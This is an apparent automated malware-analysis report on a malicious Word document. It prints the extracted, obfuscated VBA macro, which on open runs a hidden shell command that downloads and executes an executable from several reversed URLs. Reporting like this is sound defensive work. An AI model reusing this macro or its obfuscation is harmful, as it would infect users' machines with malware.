Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66b535ac033f85dd…

MALICIOUS

Office (OLE)

75.0 KB Created: 2018-09-06 10:07:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 6fcb696920107990109f2a7146320d5f SHA-1: a5a7fdfe8b9182443dbc9d525f2ea04c4495f4fc SHA-256: 66b535ac033f85ddae58c6f06d2d4ea6668f5bf34a76599a1cbd79c9a88c2a38
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

The sample contains a VBA macro that runs automatically when the document is opened (the Document_Open handler). The macro calls Shell() with vbHide to execute a command whose text never appears in plaintext: it is assembled at runtime by concatenating the return values of several helper functions (zkjhcoasm, jjOckS, and others), each of which builds its fragment from short string pieces and Chr() arithmetic, interleaved with what appear to be no-op Month calls on junk strings. This obfuscation, the blanket On Error Resume Next in every routine, and the auto-execute entry point together indicate a deliberate attempt to conceal malicious activity; the command is likely intended to download and run a secondary payload, but the full decoded command line should be recovered by emulation or sandbox execution rather than inferred from the preview alone.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6691317-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6691317-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard OOXML DrawingML namespace URI found in ordinary Office documents and is not an indicator of compromise; no download or command-and-control URL is present in plaintext because the macro assembles its command at runtime.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5397 bytes
SHA-256: 2cdc542ef7a60ed31f16b978fb014ab31d6c16eb1e7fd85d116809c2d43c5374
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "frjihcZVabZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(rvVfw) + YWbuFPuIONz + wTWvjojZwwTEo + zkjhcoasm + jjOckS + qjbut + YIdvtzbw + HnJFdqqpM, vbHide
End Sub



Attribute VB_Name = "YZZwJvBZ"
Function zkjhcoasm()

On _
Error _
Resume _
Next
Month "h" + "193794809"
   Month "C" + "382373325" + "jWKmAWnkLovUK" + "HCYlVVNTpzJ"
YOlRXtfwjkC = Chr(13 + 18 + 7 + 12 + 49) + "md /" + "V" + "/" + Chr(9 + 12 + 5 + 8 + 33) + Chr(4 + 5 + 2 + 4 + 19) + "s^" + "e^t" + " ^0"
Month "Nh" + "229110695" + "5892" + "183307552"
   Month "jjQjNdsYRB" + "CKvAOfSRFif"
   Month "7512" + "8232"
   Month "jaml" + "KX" + "kHfmpUCc" + "am"
   Month "J" + "8061" + "106" + "5775"
NwQfbb = "R^uH= " + "  ^ ^  " + " ^ ^  " + "^ " + "^" + "  ^   " + " ^}}" + "{^h" + Chr(13 + 18 + 7 + 12 + 49) + "^ta" + Chr(13 + 18 + 7 + 12 + 49) + "}"
Month "To" + "2183" + "2022" + "208383919"
   Month "Ra" + "fm"
   Month "cj" + "CDrdH" + "WdnO" + "8052"
   Month "ir" + "zBoASj" + "100742043" + "4670"
nDrNQUwRfz = "^" + ";^k^a" + "^e" + "r^b^;E" + "j" + "^J^" + "$ " + "me" + "^t^I^-"
Month "D" + "HjvnSTG"
   Month "524050229" + "7684"
   Month "556" + "mcDj"
jcEEGiQz = "^e^" + "kovn^I;" + ")^E^j" + "J$" + "^ "
Month "9001" + "24022473"
hNuVadAWKYw = ",^SAf$(" + "^el^iF^" + "dao^ln" + "^w^" + "o^D" + "^.j^W" + "r${" + "yr" + "t{)" + Chr(13 + 18 + 7 + 12 + 49) + "^"
zkjhcoasm = YOlRXtfwjkC + NwQfbb + nDrNQUwRfz + jcEEGiQz + hNuVadAWKYw
   Month "DqpGdqi" + "uk"
End Function
Function jjOckS()

On _
Error _
Resume _
Next
Month "bOYimDMjv" + "BfD" + "nvaQubENhAGF" + "BY"
   Month "3090" + "28218384"
   Month "AM" + "cUzjOV"
lSobWVsw = "u^i^$" + " " + "ni^" + " S^Af" + "$(^h" + Chr(13 + 18 + 7 + 12 + 49) + "a" + "ero^f;'" + "e^xe." + "'^+" + "^fG^i" + "$^+"
Month "Fzmqc" + "405051823" + "JlDw" + "NhYX"
   Month "Y" + "hS"
   Month "6367" + "329373959"
   Month "333981403" + "9437"
   Month "KHYrATZPT" + "9944"
vfDab = "'\" + "'^+" + Chr(13 + 18 + 7 + 12 + 49) + "i" + "lb^u^p:" + "vne$=" + "E^j^" + "J$^;" + "^'726' " + "^=^ ^f" + "^G^i^$^" + ";)'" + "@^"
Month "646" + "150470254" + "OZ" + "MmzOl"
   Month "98447993" + "5047"
iTDiOXXrGjj = "'(^ti" + "^l^p" + "S^" + "." + "'t1f" + Chr(13 + 18 + 7 + 12 + 49) + "^d" + "^h" + "^DR/gmi" + "/" + "m^o" + Chr(13 + 18 + 7 + 12 + 49) + "^." + "gninna^" + "l^" + "p-^y^a^"
Month "LjX" + "1363"
DbbjzHf = "dn" + "u" + "^" + "s//:" + "p^t^" + "th@7^s^"
Month "395704547" + "EdNbIDT"
   Month "135751151" + "307608612"
   Month "F" + "3768"
   Month "232012190" + "iMu" + "dO" + "jk"
sLlAKCIbU = "aMvnpG" + "/m^o" + Chr(13 + 18 + 7 + 12 + 49) + "^.ytr^e" + "p^orp-" + "^" + "tva" + "//^:^p" + "^tth^@x" + "a^0hl" + "x6L^8j"
Month "YUMwzR" + "199767186" + "394025302" + "4204"
   Month "5511" + "AjTiVBOSwYq" + "FnQVtD" + "480826412"
   Month "1800" + "Y"
   Month "426709181" + "jK"
ijaDwd = "/" + "mo" + Chr(13 + 18 + 7 + 12 + 49) + "." + "t^a" + "h" + Chr(13 + 18 + 7 + 12 + 49) + "^" + "eti^l^a" + "k//:" + "p^t" + "^th^@^l" + "V^Yn" + "S8^h^" + "Y"
Month "twBmiJ" + "TNTClZPjTVhDNz" + "lvpHjNp" + "1988"
   Month "koN" + "460793219"
   Month "8645" + "pn"
ujabcw = "YB/" + "ur^" + ".yt^i" + Chr(13 + 18 + 7 + 12 + 49) + "^x^a" + "//^" + ":^p" + "t" + "^t^h^@" + "n^A^3" + "^u^F" + "1^xf^P/"
Month "SraP" + "KuHO"
   Month "1580" + "LMOI"
QDGUqCmXhEX = "orp" + ".s^tr^a" + "ve" + "^d.^ai" + "d^" + "e^mkra" + "d//^" + ":p^t^t" + "^h" + "^'=" + Chr(13 + 18 + 7 + 12 + 49) + "u^i" + "$;^t" + "ne" + "i^l" + Chr(9 + 12 + 5 + 8 + 33) + "be^"
jjOckS = lSobWVsw + vfDab + iTDiOXXrGjj + DbbjzHf + sLlAKCIbU + ijaDwd + ujabcw + QDGUqCmXhEX
   Month "bOMzNkKIJ" + "vX" + "476190279" + "T"
   Month "WH" + "Fwad" + "168944056" + "8704"
   Month "RkZj" + "275821402" + "FpNtWoSlW" + "HQzFS"
   Month "aJVS"
... (truncated)